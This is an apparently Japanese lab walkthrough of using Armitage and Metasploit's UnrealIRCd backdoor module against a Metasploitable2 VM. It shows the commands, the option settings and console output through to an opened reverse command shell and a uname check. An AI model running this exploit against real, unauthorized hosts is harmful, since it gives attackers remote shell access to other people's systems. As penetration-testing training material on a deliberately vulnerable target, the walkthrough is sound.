Armitage(UnrealRCD バックドア)

今回は Metasploit の GUI版である Armitage を用いての検証。

Armitage - Cyber Attack Management for Metasploit

  • Metasploit で使うデータベースを起動する
  • データベースの初期化を行う
  • Armitage を起動する
root@kali:~# service postgresql restart
root@kali:~# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@kali:~# armitage
[*] Starting msfrpcd for you.
WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by sleep.engine.atoms.ObjectAccess (file:/usr/share/armitage/armitage.jar) to method java.lang.ProcessImpl.getErrorStream()
WARNING: Please consider reporting this to the maintainers of sleep.engine.atoms.ObjectAccess
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release
[*] MSGRPC starting on (NO SSL):Msg...
[*] Used the tab method:
[*] Warning: @(armitage.ConsoleQueue@388d3b70, 'x', '[-] Connection already established. Only one connection is allowed at a time.
[-] Run db_disconnect first if you wish to connect to a different data service.

Current connection information:
[*] Connected to msf. Connection type: postgresql.
') at
[*] Starting Cortana on
[*] Creating a default reverse handler...
[*] MSGRPC ready at 2019-09-08 01:38:21 +0900.
[*] Remote Exploits Synced




もしここで「Could not determine attack computer IP What is it?(攻撃コンピューターのIPを特定できませんでした)」と出たら、自身の IP を特定できていないので、Kali Linux の IP を入力する(攻撃先ではない)。

また、まだ一度も攻撃をかけたことがなく、攻撃先PCが表示されていない場合「メニューバー」の [Hosts] → [Add Hosts...] から攻撃先を登録する(例:Metasploitable2 の。その後、登録されたホストを右クリックし [Host] → [Operating System] → [Linux]としておく。


次に、左側のツリーリストから [exploit] → [unix] → [irc] と選び [unreal_ircd_3218_backdoor] をダブルクリックする。
Attack メニューが開くので RHOST に ターゲットの IPアドレスを入力し「Launch」をクリックする。





msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set TARGET 0
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LPORT 6217
LPORT => 6217
[-] The value specified for PAYLOAD is not valid.
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RPORT 6667
RPORT => 6667
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP double handler on 
[*] - Connected to
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...

    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

[*] - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo VXh8feb0lckv3svM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "VXh8feb0lckv3svM\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened ( -> at 2019-09-08 02:40:04 +0900

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) >

ターゲットを右クリックし [Shell 1] → [Interact] とクリック。


コンソールでコマンド入力 uname -a

Metasploitable2 に侵入できていることが分かる。